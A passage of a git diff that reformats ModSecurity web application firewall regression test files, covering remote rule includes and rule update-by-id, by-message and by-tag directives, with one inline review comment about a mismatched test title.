charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Request was relevant to be saved.", + "expected": { + "debug_log": "Request was relevant to be saved.", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,status:302,redirect:'http://www.google.com'\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,block\"", diff --git a/test/test-cases/regression/config-secremoterules.json b/test/test-cases/regression/config-secremoterules.json index 5065e06b64..9ff647afe3 100644 --- a/test/test-cases/regression/config-secremoterules.json +++ b/test/test-cases/regression/config-secremoterules.json 
@@ -1,95 +1,134 @@ [ { - "enabled":1, - "version_min":300000, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules", "resource": "curl", - "title":"Include remote rules", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME" + "expected": { + "debug_log": "Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRules key https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/refs/heads/v3/master/test/modsecurity-regression-rules.txt", "SecRule ARGS \"@contains somethingelse\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Abort)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Abort)", - "expected":{ + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Failed to download" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Abort", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Warn)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Warn)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + 
"Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"somethingelse\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"somethingelse\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Warn", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt", diff --git a/test/test-cases/regression/config-update-action-by-id.json b/test/test-cases/regression/config-update-action-by-id.json index 4e1a3fc24e..a960eb2916 100644 --- a/test/test-cases/regression/config-update-action-by-id.json +++ b/test/test-cases/regression/config-update-action-by-id.json 
@@ -1,272 +1,294 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Skipped rule id '200005'" + "expected": { + "debug_log": "Skipped rule id '200005'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Dropping the evaluation of upcoming rules in favor of" + "expected": { + "debug_log": "Dropping the evaluation of upcoming rules in favor of", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (6/n)", - "issue":"2005", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + 
"body": [ "no need." ] }, - "expected":{ - "http_code": 302, - "error_log": "Access denied with code 302" + "expected": { + "error_log": "Access denied with code 302", + "http_code": 302 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" ] } ] - diff --git a/test/test-cases/regression/config-update-target-by-id.json b/test/test-cases/regression/config-update-target-by-id.json index 8faecaefe6..a8bc0ea05a 100644 --- a/test/test-cases/regression/config-update-target-by-id.json +++ b/test/test-cases/regression/config-update-target-by-id.json 
@@ -1,199 +1,224 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude whole collection", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude whole collection", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using regex", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using regex", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?mixpanel=value&mixpanel=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value&mixpanel=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:/mixpanel$/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?mixpanel=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:mixpanel", "SecRule ARGS \"@contains value\" \"id:1,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?xxxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?xxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" diff --git a/test/test-cases/regression/config-update-target-by-msg.json b/test/test-cases/regression/config-update-target-by-msg.json index 24fe343cd0..2c33890fa6 100644 --- a/test/test-cases/regression/config-update-target-by-msg.json +++ b/test/test-cases/regression/config-update-target-by-msg.json 
@@ -1,39 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByMsg test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,msg:'test',deny\"" diff --git a/test/test-cases/regression/config-update-target-by-tag.json b/test/test-cases/regression/config-update-target-by-tag.json index 10d4c1b487..32167c08fe 100644 --- a/test/test-cases/regression/config-update-target-by-tag.json +++ b/test/test-cases/regression/config-update-target-by-tag.json 
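Review bot: The test title is `"SecRuleUpdateTargetByTag"`, but the file is config-update-target-by-msg.json and the directive under test is `SecRuleUpdateTargetByMsg test !ARGS`, so a failure report would name the wrong directive. Since the line is rewritten here anyway, change it to `"title": "SecRuleUpdateTargetByMsg",`. The closing brackets of the test lie outside the hunk.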
@@ -1,282 +1,317 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
